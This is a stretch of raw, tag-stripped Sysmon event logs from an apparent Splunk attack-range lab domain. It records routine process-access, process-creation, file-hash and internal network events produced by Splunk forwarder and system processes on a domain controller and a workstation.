07:55:58.585{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104421Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:58.585{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104420Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:58.585{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104419Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:58.585{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B38E-615A-F001-00000000FC01}4500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104418Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:58.585{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B38E-615A-F001-00000000FC01}4500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104417Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:58.586{58E9C193-B38E-615A-F001-00000000FC01}4500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104416Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:58.116{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBFD27C64AC80AD4D0DD1D207F99C0AD,SHA256=73BB72DD9AE3485A74FC5E45D6C5D0B3CCA4F576D02BB32D6EDF7A4CE6802D18,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082337Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:54.699{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50090-false10.0.1.12-8000- 23542300x800000000000000082354Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:59.994{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB7D22BB6406279046658EB42DDBA51E,SHA256=563E5B154977E767531D6F7DCDFE5977F3E3C300E2B1EF5953754FF91EFC319E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082353Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:59.994{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D03A451D4C3F95C4F989D38474EFACE,SHA256=CC4866A7652EF8F924B0A84967E7C5962A430CE1A23453CAB571E0D7AB99BDA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082352Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:59.650{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3FF53E26F4C39F101ECCF49FBB75087,SHA256=3250DBC214EF454FEBA669ACE26EEF0AA7A7D888C6AB7A9098B0DABA5884265B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104437Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:59.741{58E9C193-B38F-615A-F101-00000000FC01}53525360C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104436Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:59.554{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B38F-615A-F101-00000000FC01}5352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104435Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:59.554{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104434Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:59.554{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104433Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:59.554{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104432Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:59.554{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104431Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:59.554{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B38F-615A-F101-00000000FC01}5352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104430Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:59.554{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B38F-615A-F101-00000000FC01}5352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104429Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:59.554{58E9C193-B38F-615A-F101-00000000FC01}5352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104428Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:59.132{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A12498A2D4B40ADADC54D0AD403400F,SHA256=F466DDED02E63C4A9105F8F15D161AD5DF7C3CDEBB69B54E4ABF96A4D55339D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104427Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:59.069{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=779246C193B06D1BD59119F7CBFB4B0D,SHA256=6B29CABBF0F1498A46AAB0039D581CC3C843B60BCACA6C00EC9E55FACB536BC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104426Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:59.069{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20D2692C90EE1A58622E12641F682CA5,SHA256=5ABCF2F0D6184BB49B08039A552E3595A88C986143386F1AF9E7908FAED19ECC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104425Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:57.141{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49601-false10.0.1.12-8089- 23542300x800000000000000082355Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:00.666{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D719FEFFF183F19E6D659C0811C1F871,SHA256=D580CB62752ADA346FF6285853A92DF62257FFB70600DBFA6176B3B93F2822C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104449Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:00.663{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=779246C193B06D1BD59119F7CBFB4B0D,SHA256=6B29CABBF0F1498A46AAB0039D581CC3C843B60BCACA6C00EC9E55FACB536BC1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104448Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:00.460{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B390-615A-F201-00000000FC01}5324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104447Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:00.460{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104446Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:00.460{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104445Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:00.460{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104444Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:00.460{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104443Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:00.460{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B390-615A-F201-00000000FC01}5324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104442Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:00.460{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B390-615A-F201-00000000FC01}5324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104441Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:00.461{58E9C193-B390-615A-F201-00000000FC01}5324C:\Program 